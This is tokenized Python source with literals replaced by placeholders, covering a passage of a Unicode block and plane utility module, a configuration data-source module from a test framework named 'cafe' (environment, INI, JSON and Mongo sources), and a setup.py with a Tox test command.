"<STR_LIT>" <EOL> high_surrogate_area = "<STR_LIT>" <EOL> low_surrogate_area = "<STR_LIT>" <EOL> private_use_area = "<STR_LIT>" <EOL> cjk_compatibility_ideographs = "<STR_LIT>" <EOL> alphabetic_presentation_forms = "<STR_LIT>" <EOL> arabic_presentation_forms_a = "<STR_LIT>" <EOL> variation_selectors = "<STR_LIT>" <EOL> combining_half_marks = "<STR_LIT>" <EOL> cjk_compatibility_forms = "<STR_LIT>" <EOL> small_form_variants = "<STR_LIT>" <EOL> arabic_presentation_forms_b = "<STR_LIT>" <EOL> halfwidth_and_fullwidth_forms = "<STR_LIT>" <EOL> specials = "<STR_LIT>" <EOL> linear_b_syllabary = "<STR_LIT>" <EOL> linear_b_ideograms = "<STR_LIT>" <EOL> aegean_numbers = "<STR_LIT>" <EOL> old_italic = "<STR_LIT>" <EOL> gothic = "<STR_LIT>" <EOL> ugaritic = "<STR_LIT>" <EOL> deseret = "<STR_LIT>" <EOL> shavian = "<STR_LIT>" <EOL> osmanya = "<STR_LIT>" <EOL> cypriot_syllabary = "<STR_LIT>" <EOL> byzantine_musical_symbols = "<STR_LIT>" <EOL> musical_symbols = "<STR_LIT>" <EOL> tai_xuan_jing_symbols = "<STR_LIT>" <EOL> mathematical_alphanumeric_symbols = "<STR_LIT>" <EOL> cjk_unified_ideographs_extension_b = "<STR_LIT>" <EOL> cjk_compatibility_ideographs_supplement = ( <EOL> "<STR_LIT>" ) <EOL> unused = "<STR_LIT>" <EOL> tags = "<STR_LIT>" <EOL> variation_selectors_supplement = "<STR_LIT>" <EOL> supplementary_private_use_area_a = "<STR_LIT>" <EOL> supplementary_private_use_area_b = "<STR_LIT>" <EOL> _unicode_planes = ( <EOL> ( <NUM_LIT> , <NUM_LIT> , PLANE_NAMES . basic_multilingual_plane ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , PLANE_NAMES . supplementary_multilingual_plane ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , PLANE_NAMES . supplementary_ideographic_plane ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , PLANE_NAMES . unassigned ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , PLANE_NAMES . supplementary_special_purpose_plane ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , PLANE_NAMES . supplementary_private_use_area ) ) <EOL> _unicode_blocks = ( <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . 
basic_latin ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . c1_controls_and_latin_1_supplement ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . latin_extended_a ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . latin_extended_b ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . ipa_extensions ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . spacing_modifier_letters ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . combining_diacritical_marks ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . greek_coptic ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cyrillic ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cyrillic_supplement ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . armenian ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . hebrew ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . arabic ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . syriac ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . thaana ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . devanagari ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . bengali_assamese ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . gurmukhi ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . gujarati ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . oriya ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . tamil ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . telugu ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . kannada ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . malayalam ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . sinhala ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . thai ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . lao ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . tibetan ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . myanmar ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . georgian ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . 
hangul_jamo ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . ethiopic ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cherokee ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <EOL> BLOCK_NAMES . unified_canadian_aboriginal_syllabics ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . ogham ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . runic ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . tagalog ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . hanunoo ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . buhid ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . tagbanwa ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . khmer ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . mongolian ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . limbu ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . tai_le ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . khmer_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . phonetic_extensions ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . latin_extended_additional ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . greek_extended ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . general_punctuation ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . superscripts_and_subscripts ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . currency_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <EOL> BLOCK_NAMES . combining_diacritical_marks_for_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . letterlike_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . number_forms ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . arrows ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . mathematical_operators ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . 
miscellaneous_technical ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . control_pictures ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . optical_character_recognition ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . enclosed_alphanumerics ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . box_drawing ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . block_elements ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . geometric_shapes ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . miscellaneous_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . dingbats ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . miscellaneous_mathematical_symbols_a ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . supplemental_arrows_a ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . braille_patterns ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . supplemental_arrows_b ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . miscellaneous_mathematical_symbols_b ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . supplemental_mathematical_operators ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . miscellaneous_symbols_and_arrows ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cjk_radicals_supplement ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . kangxi_radicals ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . ideographic_description_characters ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cjk_symbols_and_punctuation ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . hiragana ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . katakana ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . bopomofo ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . hangul_compatibility_jamo ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . kanbun_kunten ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . bopomofo_extended ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . 
undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . katakana_phonetic_extensions ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . enclosed_cjk_letters_and_months ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cjk_compatibility ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cjk_unified_ideographs_extension_a ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . yijing_hexagram_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cjk_unified_ideographs ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . yi_syllables ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . yi_radicals ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . hangul_syllables ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . high_surrogate_area ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . low_surrogate_area ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . private_use_area ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cjk_compatibility_ideographs ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . alphabetic_presentation_forms ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . arabic_presentation_forms_a ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . variation_selectors ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . combining_half_marks ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cjk_compatibility_forms ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . small_form_variants ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . arabic_presentation_forms_b ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . halfwidth_and_fullwidth_forms ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . specials ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . linear_b_syllabary ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . 
linear_b_ideograms ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . aegean_numbers ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . old_italic ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . gothic ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . ugaritic ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . deseret ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . shavian ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . osmanya ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cypriot_syllabary ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . byzantine_musical_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . musical_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . tai_xuan_jing_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . mathematical_alphanumeric_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cjk_unified_ideographs_extension_b ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <EOL> BLOCK_NAMES . cjk_compatibility_ideographs_supplement ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . unused ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . tags ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . unused ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . variation_selectors_supplement ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . unused ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . supplementary_private_use_area_a ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . unused ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . 
supplementary_private_use_area_b ) ) <EOL> class UnicodeRange ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , start , end , name ) : <EOL> self . name = name <EOL> self . start = start <EOL> self . end = end <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . format ( <EOL> hex ( self . start ) , hex ( self . end ) , str ( self . name ) ) <EOL> def codepoints ( self ) : <EOL> """<STR_LIT>""" <EOL> for codepoint in range ( self . start , self . end + <NUM_LIT:1> ) : <EOL> yield codepoint <EOL> def codepoint_names ( self ) : <EOL> """<STR_LIT>""" <EOL> for codepoint in self . codepoints ( ) : <EOL> yield codepoint_name ( codepoint ) <EOL> def encoded_codepoints ( self , encoding = '<STR_LIT:utf-8>' ) : <EOL> """<STR_LIT>""" <EOL> for codepoint in self . codepoints ( ) : <EOL> yield six . unichr ( codepoint ) . encode ( encoding ) <EOL> class UnicodeRangeList ( list ) : <EOL> """<STR_LIT>""" <EOL> def __str__ ( self ) : <EOL> ret_str = '<STR_LIT:[>' <EOL> for unicode_range in self : <EOL> ret_str = '<STR_LIT>' . format ( ret_str , str ( unicode_range ) ) <EOL> return '<STR_LIT>' . format ( ret_str ) <EOL> def codepoints ( self ) : <EOL> """<STR_LIT>""" <EOL> for unicode_range in self : <EOL> for codepoint in unicode_range . codepoints ( ) : <EOL> yield codepoint <EOL> def codepoint_names ( self ) : <EOL> """<STR_LIT>""" <EOL> for codepoint in self . codepoints ( ) : <EOL> yield codepoint_name ( codepoint ) <EOL> def encoded_codepoints ( self , encoding = '<STR_LIT:utf-8>' ) : <EOL> """<STR_LIT>""" <EOL> for codepoint in self . codepoints ( ) : <EOL> yield six . unichr ( codepoint ) . encode ( encoding ) <EOL> def get_range ( self , range_name ) : <EOL> """<STR_LIT>""" <EOL> for unicode_range in self : <EOL> if unicode_range . name == range_name : <EOL> return unicode_range <EOL> def get_range_list ( self , range_name_list ) : <EOL> """<STR_LIT>""" <EOL> range_list = UnicodeRangeList ( ) <EOL> for unicode_range in self : <EOL> if unicode_range . 
name in range_name_list : <EOL> range_list . append ( unicode_range ) <EOL> return range_list <EOL> UNICODE_BLOCKS = UnicodeRangeList ( ) <EOL> for _start , _end , _name in _unicode_blocks : <EOL> UNICODE_BLOCKS . append ( UnicodeRange ( _start , _end , _name ) ) <EOL> UNICODE_PLANES = UnicodeRangeList ( ) <EOL> for _start , _end , _name in _unicode_planes : <EOL> UNICODE_PLANES . append ( UnicodeRange ( _start , _end , _name ) ) <EOL> def codepoint_parent_plane ( codepoint_integer ) : <EOL> """<STR_LIT>""" <EOL> for plane in UNICODE_PLANES : <EOL> if codepoint_integer >= plane . start and codepoint_integer <= plane . end : <EOL> return plane <EOL> def codepoint_parent_block ( codepoint_integer ) : <EOL> """<STR_LIT>""" <EOL> for block in UNICODE_BLOCKS : <EOL> if codepoint_integer >= block . start and codepoint_integer <= block . end : <EOL> return block <EOL> def codepoint_name ( codepoint_integer ) : <EOL> """<STR_LIT>""" <EOL> if ( codepoint_integer < UNICODE_STARTING_CODEPOINT ) or ( codepoint_integer > ( UNICODE_ENDING_CODEPOINT + <NUM_LIT:1> ) ) : <EOL> return None <EOL> return unicodedata . name ( <EOL> six . unichr ( codepoint_integer ) , hex ( codepoint_integer ) ) </s>
<s> import abc <EOL> import json <EOL> import os <EOL> from six . moves import configparser <EOL> from six import add_metaclass <EOL> from cafe . common . reporting import cclogging <EOL> try : <EOL> from cafe . engine . mongo . client import BaseMongoClient <EOL> except : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class ConfigDataException ( Exception ) : <EOL> pass <EOL> class NonExistentConfigPathError ( Exception ) : <EOL> pass <EOL> class ConfigEnvironmentVariableError ( Exception ) : <EOL> pass <EOL> def expected_values ( * values ) : <EOL> def decorator ( fn ) : <EOL> def wrapped ( ) : <EOL> class UnexpectedConfigOptionValueError ( Exception ) : <EOL> pass <EOL> value = fn ( ) <EOL> if value not in values : <EOL> raise UnexpectedConfigOptionValueError ( value ) <EOL> return fn ( ) <EOL> return wrapped <EOL> return decorator <EOL> def _get_path_from_env ( os_env_var ) : <EOL> try : <EOL> return os . environ [ os_env_var ] <EOL> except KeyError : <EOL> msg = "<STR_LIT>" . format ( <EOL> os_env_var ) <EOL> raise ConfigEnvironmentVariableError ( msg ) <EOL> except Exception as exception : <EOL> print ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( os_env_var ) ) <EOL> raise exception <EOL> CONFIG_KEY = '<STR_LIT>' <EOL> @ add_metaclass ( abc . ABCMeta ) <EOL> class DataSource ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _log = cclogging . logging . getLogger ( <EOL> cclogging . get_object_namespace ( self . __class__ ) ) <EOL> def get ( self , item_name , default = None ) : <EOL> raise NotImplementedError <EOL> def get_raw ( self , item_name , default = None ) : <EOL> raise NotImplementedError <EOL> def get_boolean ( self , item_name , default = None ) : <EOL> raise NotImplementedError <EOL> def get_json ( self , item_name , default = None ) : <EOL> raise NotImplementedError <EOL> @ staticmethod <EOL> def _str_to_bool ( value ) : <EOL> """<STR_LIT>""" <EOL> if value : <EOL> return value . 
lower ( ) == '<STR_LIT:true>' <EOL> return None <EOL> @ staticmethod <EOL> def _parse_json ( value , log = None ) : <EOL> """<STR_LIT>""" <EOL> if not value : <EOL> return None <EOL> try : <EOL> return json . loads ( value ) <EOL> except ValueError as error : <EOL> if log is not None : <EOL> log . warning ( "<STR_LIT>" <EOL> . format ( value , error ) ) <EOL> return None <EOL> class EnvironmentVariableDataSource ( DataSource ) : <EOL> def __init__ ( self , section_name ) : <EOL> super ( EnvironmentVariableDataSource , self ) . __init__ ( ) <EOL> self . _section_name = section_name <EOL> def get ( self , item_name , default = None ) : <EOL> return os . environ . get ( CONFIG_KEY . format ( <EOL> section_name = self . _section_name , key = item_name ) , default ) <EOL> def get_raw ( self , item_name , default = None ) : <EOL> return self . get ( item_name , default ) <EOL> def get_boolean ( self , item_name , default = None ) : <EOL> return self . _str_to_bool ( self . get ( item_name , default ) ) <EOL> def get_json ( self , item_name , default = None ) : <EOL> return self . _parse_json ( self . get ( item_name , default ) , log = self . _log ) <EOL> class ConfigParserDataSource ( DataSource ) : <EOL> def __init__ ( self , config_file_path , section_name ) : <EOL> super ( ConfigParserDataSource , self ) . __init__ ( ) <EOL> cafe_env_var = { key : value for key , value in os . environ . iteritems ( ) <EOL> if key . startswith ( '<STR_LIT>' ) } <EOL> self . _data_source = configparser . SafeConfigParser ( <EOL> defaults = cafe_env_var ) <EOL> self . _section_name = section_name <EOL> if not os . path . exists ( config_file_path ) : <EOL> msg = '<STR_LIT>' . format ( config_file_path ) <EOL> raise NonExistentConfigPathError ( msg ) <EOL> try : <EOL> self . _data_source . read ( config_file_path ) <EOL> except Exception as exception : <EOL> self . _log . 
exception ( exception ) <EOL> raise exception <EOL> def get ( self , item_name , default = None ) : <EOL> try : <EOL> return self . _data_source . get ( self . _section_name , item_name ) <EOL> except ( configparser . NoOptionError , configparser . NoSectionError ) as e : <EOL> if default is None : <EOL> self . _log . error ( str ( e ) ) <EOL> else : <EOL> msg = "<STR_LIT>" . format ( <EOL> str ( e ) , default ) <EOL> self . _log . warning ( msg ) <EOL> return default <EOL> def get_raw ( self , item_name , default = None ) : <EOL> try : <EOL> return self . _data_source . get ( <EOL> self . _section_name , item_name , raw = True ) <EOL> except ( configparser . NoOptionError , configparser . NoSectionError ) as e : <EOL> if default is None : <EOL> self . _log . error ( str ( e ) ) <EOL> else : <EOL> msg = "<STR_LIT>" . format ( <EOL> str ( e ) , default ) <EOL> self . _log . warning ( msg ) <EOL> return default <EOL> def get_boolean ( self , item_name , default = None ) : <EOL> try : <EOL> return self . _data_source . getboolean ( self . _section_name , item_name ) <EOL> except ( configparser . NoOptionError , configparser . NoSectionError ) as e : <EOL> if default is None : <EOL> self . _log . error ( str ( e ) ) <EOL> else : <EOL> msg = "<STR_LIT>" . format ( <EOL> str ( e ) , default ) <EOL> self . _log . warning ( msg ) <EOL> return default <EOL> def get_json ( self , item_name , default = None ) : <EOL> value = self . _parse_json ( self . get ( item_name , None ) , log = self . _log ) <EOL> if value is None : <EOL> return default <EOL> return value <EOL> class DictionaryDataSource ( DataSource ) : <EOL> def get ( self , item_name , default = None ) : <EOL> section = self . _data_source . get ( self . _section_name ) <EOL> if section is None : <EOL> self . _log . error ( "<STR_LIT>" . format ( <EOL> section_name = self . _section_name ) ) <EOL> return None <EOL> if item_name not in section : <EOL> self . _log . error ( <EOL> "<STR_LIT>" . 
format ( <EOL> section_name = self . _section_name , item_name = item_name ) ) <EOL> return default <EOL> return section . get ( item_name , default ) <EOL> def get_raw ( self , item_name , default = None ) : <EOL> section = self . _data_source . get ( self . _section_name ) <EOL> if section is None : <EOL> self . _log . error ( "<STR_LIT>" . format ( <EOL> section_name = self . _section_name ) ) <EOL> return None <EOL> if item_name not in section : <EOL> self . _log . error ( <EOL> "<STR_LIT>" . format ( <EOL> section_name = self . _section_name , item_name = item_name ) ) <EOL> return default <EOL> return section . get ( item_name , default ) <EOL> def get_boolean ( self , item_name , default = None ) : <EOL> section = self . _data_source . get ( self . _section_name ) <EOL> if section is None : <EOL> self . _log . error ( "<STR_LIT>" . format ( <EOL> section_name = self . _section_name ) ) <EOL> return None <EOL> if item_name not in section : <EOL> self . _log . error ( <EOL> "<STR_LIT>" . format ( <EOL> section_name = self . _section_name , item_name = item_name ) ) <EOL> return default <EOL> return self . _str_to_bool ( self . get ( item_name , default ) ) <EOL> def get_json ( self , item_name , default = None ) : <EOL> value = self . _parse_json ( self . get ( item_name , None ) , log = self . _log ) <EOL> if value is None : <EOL> return default <EOL> return value <EOL> class JSONDataSource ( DictionaryDataSource ) : <EOL> def __init__ ( self , config_file_path , section_name ) : <EOL> super ( JSONDataSource , self ) . __init__ ( ) <EOL> self . _section_name = section_name <EOL> if not os . path . exists ( config_file_path ) : <EOL> msg = '<STR_LIT>' . format ( config_file_path ) <EOL> raise NonExistentConfigPathError ( msg ) <EOL> with open ( config_file_path ) as config_file : <EOL> config_data = config_file . read ( ) <EOL> try : <EOL> self . _data_source = json . loads ( config_data ) <EOL> except Exception as exception : <EOL> self . _log . 
exception ( exception ) <EOL> raise exception <EOL> class MongoDataSource ( DictionaryDataSource ) : <EOL> def __init__ ( <EOL> self , hostname , db_name , username , password , config_name , <EOL> section_name ) : <EOL> super ( MongoDataSource , self ) . __init__ ( ) <EOL> self . _section_name = section_name <EOL> self . db = BaseMongoClient ( <EOL> hostname = hostname , db_name = db_name , <EOL> username = username , password = password ) <EOL> self . db . connect ( ) <EOL> self . db . auth ( ) <EOL> self . _data_source = self . db . find_one ( { '<STR_LIT>' : config_name } ) <EOL> class BaseConfigSectionInterface ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , config_file_path , section_name ) : <EOL> self . _log = cclogging . logging . getLogger ( <EOL> cclogging . get_object_namespace ( self . __class__ ) ) <EOL> self . _override = EnvironmentVariableDataSource ( <EOL> section_name ) <EOL> self . _data_source = ConfigParserDataSource ( <EOL> config_file_path , section_name ) <EOL> self . _section_name = section_name <EOL> def get ( self , item_name , default = None ) : <EOL> return self . _override . get ( item_name , None ) or self . _data_source . get ( item_name , default ) <EOL> def get_raw ( self , item_name , default = None ) : <EOL> return self . _override . get_raw ( item_name , None ) or self . _data_source . get_raw ( item_name , default ) <EOL> def get_boolean ( self , item_name , default = None ) : <EOL> value = self . _override . get_boolean ( item_name , None ) <EOL> if value is None : <EOL> value = self . _data_source . get_boolean ( item_name , default ) <EOL> return value <EOL> def get_json ( self , item_name , default = None ) : <EOL> value = self . _override . get_json ( item_name , None ) <EOL> if value is None : <EOL> value = self . _data_source . 
get_json ( item_name , default ) <EOL> return value <EOL> class ConfigSectionInterface ( BaseConfigSectionInterface ) : <EOL> def __init__ ( self , config_file_path = None , section_name = None ) : <EOL> section_name = ( section_name or <EOL> getattr ( self , '<STR_LIT>' , None ) or <EOL> getattr ( self , '<STR_LIT>' , None ) ) <EOL> config_file_path = config_file_path or _get_path_from_env ( <EOL> '<STR_LIT>' ) <EOL> super ( ConfigSectionInterface , self ) . __init__ ( <EOL> config_file_path , section_name ) </s>
<s> from setuptools import setup , find_packages <EOL> import sys <EOL> from setuptools . command . test import test as TestCommand <EOL> class Tox ( TestCommand ) : <EOL> def finalize_options ( self ) : <EOL> TestCommand . finalize_options ( self ) <EOL> self . test_args = [ ] <EOL> self . test_suite = True <EOL> def run_tests ( self ) : <EOL> import tox <EOL> errno = tox . cmdline ( self . test_args ) <EOL> sys . exit ( errno ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> namespace_packages = [ '<STR_LIT>' ] , <EOL> install_requires = [ '<STR_LIT>' ] , <EOL> tests_require = [ '<STR_LIT>' ] , <EOL> cmdclass = { '<STR_LIT:test>' : Tox } , <EOL> zip_safe = False ) </s>
